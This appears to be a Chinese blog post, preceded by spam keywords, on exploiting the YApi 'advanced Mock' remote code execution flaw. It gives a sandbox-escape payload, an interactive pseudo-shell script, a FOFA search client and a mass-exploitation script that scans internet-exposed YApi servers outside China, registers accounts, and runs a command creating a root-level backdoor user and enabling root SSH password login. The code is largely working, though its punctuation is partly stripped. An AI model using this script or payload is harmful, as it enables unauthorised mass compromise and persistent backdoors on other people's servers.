公司网站代码模板,成都系统定制,做示意图的网站,网站推广的优缺点一、漏洞复现
首先祭出fofa#xff0c;搜索语句为 appyapi#xff0c;但是为了避开国内#xff0c;所以使用 appyapi countrySG#xff0c;SG为新加坡#xff0c;结果如图
虽然有30页#xff0c;但是能利用的可能也没几… 一、漏洞复现
首先祭出fofa搜索语句为 appyapi但是为了避开国内所以使用 appyapi countrySGSG为新加坡结果如图
虽然有30页但是能利用的可能也没几个而且 docker 居多 顺便记录一下验证 docker 的两个小方法 ps -ef docker 一般显示很少的进程ls -a /.dockerenv 点击注册信息随便填但是可能会遇到这种情况
这是第一道坎不第一道坎应该是压根就访问不了这是第二道坎
找了个能注册的注册完进入如图页面点击 添加项目
添加完项目进入如下页面继续 添加接口
添加完接口进入如下页面点击 高级Mock
将《高级Mock可以获取到系统操作权限》中的exp保存到脚本中但是这里可能保存不成功第三道坎 回到预览页面点击下方的链接
可以看到命令成功执行了而且这很大概率不是docker然后这里有第四道坎命令可能根本执行不成功比如 百度yapi
# 二、伪shell的编写
一开始只是想写个脚本快速改Mock脚本返回执行结果假装拿到了一个shell
# codingutf-8
import jsonimport requestsurl http://ip:port/r requests.session()projectID 131 # http://ip:port/project/131/interface/api/1141
interfaceID 1141 # 131 projectID 1141 interfaceIDheaders {Content-Type: application/json
}def login():data {email: sadqq.com,password: asd}rsp r.post(url api/user/login, datajson.dumps(data), headersheaders)print(rsp.text)def rce(cmd): # 这里做了优化对全局变量进行修改需要关闭 ‘高级Mock’ 中的脚本poc const sandbox this
const ObjectConstructor this.constructor
const FunctionConstructor ObjectConstructor.constructor
const myfun FunctionConstructor(return process)
const process myfun()
mockJson process.mainModule.require(child_process).execSync({}).toString().format(cmd)data {id: projectID, project_mock_script: fconst sandbox this
const ObjectConstructor this.constructor
const FunctionConstructor ObjectConstructor.constructor
const myfun FunctionConstructor(return process)
const process myfun()
mockJson process.mainModule.require(child_process).execSync({cmd}).toString(),is_mock_open: True}rsp r.post(url api/project/up, datajson.dumps(data), headersheaders)print(rsp.text)def result():url2 url fmock/{projectID}/1/1rsp r.get(url2, headersheaders)print(rsp.text)if __name__ __main__:login()while True:cmd input($ )rce(cmd)result()
该处使用的url网络请求的数据。
# 二、批量脚本
可能人就是太不能满足了吧写完 伪shell脚本 之后我又觉得再加点料就能整个批量了然后就有了下面的脚本
提示脚本中使用的命令可能无法正常运行反弹shell才是永远的神。比如我就经常遇到 useradd 不存在的报错但是这种明显是可以执行命令的。所以请关注脚本的输出
# fofa.py
通过 pip install fofa 下载但是在 python3 中并不能正常运行所以我修改了一下脚本改名为 fofa.py 放在脚本的执行目录。
# -*- coding: utf-8 -*-
import base64
import json
import urllib
import urllib.error
import urllib.parse
import urllib.requestclass Client:def __init__(self, email, key):self.email emailself.key keyself.base_url https://fofa.soself.search_api_url /api/v1/search/allself.login_api_url /api/v1/info/myself.get_userinfo() # check email and keydef get_userinfo(self):api_full_url %s%s % (self.base_url, self.login_api_url)param {email: self.email, key: self.key}res self.__http_get(api_full_url, param)return json.loads(res)def get_data(self, query_str, page1, fields):res self.get_json_data(query_str, page, fields)return json.loads(res)def get_json_data(self, query_str, page1, fields):api_full_url %s%s % (self.base_url, self.search_api_url)param {qbase64: base64.b64encode(query_str), email: self.email, key: self.key, page: page,fields: fields}res self.__http_get(api_full_url, param)return resdef __http_get(self, url, param):param urllib.parse.urlencode(param)url %s?%s % (url, param)try:req urllib.request.Request(url)res urllib.request.urlopen(req).read()if berrmsg in res:raise RuntimeError(res)except urllib.error.HTTPError as e:print(errmsg e.read().decode()),raise ereturn res
# fofasearch.py
import reimport fofaclass Fofa:email fofa_accountkey key # key 在 个人资料中client fofa.Client(email, key)def __init__(self, query_str):self.query_str query_strdef search(self, page):hostList []data self.client.get_data(self.query_str.encode(), pagepage, fieldshost)for host in data[results]:if re.search(http[s]?://, host) is None:host http:// hostif re.search(/$, host) is not None:host host[:-1]hostList.append(host)return hostListif __name__ __main__:F Fofa(appyapi)for page in range(1, 10):print(F.search(page))
# yapi.py
# codingutf-8
import json
import sysimport requestsfrom fofasearch import Fofaexp const sandbox this
const ObjectConstructor this.constructor
const FunctionConstructor ObjectConstructor.constructor
const myfun FunctionConstructor(return process)
const process myfun()
mockJson process.mainModule.require(child_process).execSync({}).toString()class Yapi:def __init__(self, url):self.r requests.session()self.url urlself.headers {Content-Type: application/json}print(\n\n * * 10 url * * 10)def register(self, email, passwd, username):data {email: email,password: passwd,username: username}rsp self.r.post(self.url /api/user/reg, datajson.dumps(data), headersself.headers, timeout2)# print(rsp)print(json.loads(rsp.text)[errmsg])return json.loads(rsp.text)[errmsg]def login(self, email, passwd):data {email: email,password: passwd}rsp self.r.post(self.url /api/user/login, datajson.dumps(data), headersself.headers, timeout2)print(json.loads(rsp.text)[errmsg])return json.loads(rsp.text)[errmsg]def getGroupId(self):rsp self.r.get(self.url /api/group/get_mygroup, timeout2)return json.loads(rsp.text)[data][_id]def addProject(self, groupid):data {name: 1,basepath: /1,desc: 1,group_id: groupid,icon: code-o,color: pink,project_type: private}rsp self.r.post(self.url /api/project/add, datajson.dumps(data), headersself.headers, timeout2)projectId json.loads(rsp.text)[data][_id]return projectIddef addInterface(self, projectID):data {method: GET,catid: 112,title: 1,path: /1,project_id: projectID}rsp self.r.post(self.url /api/interface/add, datajson.dumps(data), headersself.headers, timeout2)interfaceID json.loads(rsp.text)[data][_id]return interfaceIDdef isDocker(self, projectID):data {id: projectID,project_mock_script: exp.format(ls -al /),is_mock_open: True}self.r.post(self.url /api/project/up, datajson.dumps(data), headersself.headers, timeout10)def rce(self, cmd, projectID, interfaceId):data {id: projectID,project_mock_script: exp.format(cmd),is_mock_open: True}rsp self.r.post(self.url /api/project/up, datajson.dumps(data), headersself.headers)# print(rsp.text)def result(self, projectId):url2 self.url f/mock/{projectId}/1/1rsp self.r.get(url2, headersself.headers)return rsp.textdef main(host, cmd, emailjklasdsdyapi.com, passwd123456, usernameadmin, shellFalse, passDockerFalse):y Yapi(host)try:regResult y.register(email, passwd, username)except:print(register failed)returnif regResult 该email已经注册:try:print(try Login...)result y.login(email, passwd)if result ! logout success...:print(login failed...)returnexcept:print(Login failed)returntry:groupId y.getGroupId()projectID y.addProject(groupId)print(projectID: str(projectID))interfaceID y.addInterface(projectID)except:returntry:y.isDocker(projectID)result y.result(projectID)except:print(Command execution failed)returnif .dockerenv in result:print(this is Docker)if passDocker:returnif shell:while True:cmd input(\n# )y.rce(cmd, projectID, interfaceID)y.result(projectID)else:try:y.rce(cmd, projectID, interfaceID)result y.result(projectID)except:print(Command execution failed)returnif Invalid or unexpected token in result:print(Command execution failed)elif len(result) 0:print(no echo)else:try:print(result)except:print(result.encode())if __name__ __main__:query_str appyapi country!CNcmd adduser sddads echo sddads:Ll123lL|chpasswd sed -i $csddads:x:0:0:root:/root:/bin/bash /etc/passwd sed -i s/#* *PermitRootLogin.*/PermitRootLogin yes/g /etc/ssh/sshd_config sed -i s/#* *PasswordAuthentication.*/PasswordAuthentication yes/g /etc/ssh/sshd_config echo success systemctl reload ssh | systemctl reload sshd # 这里是要执行的命令# f open(yapi.log, a)# sys.stdout fF Fofa(query_str)for page in range(1, 58):hostList F.search(page)for host in hostList:try:requests.get(host, timeout2)except:print(\n\n **10 host **10)print(connection failed)continuemain(host, cmd)# f.close()
跑起来就是这种效果但是我的那套命令不是很好通常是解析出错可以的话师傅们能给点指导意见嘛
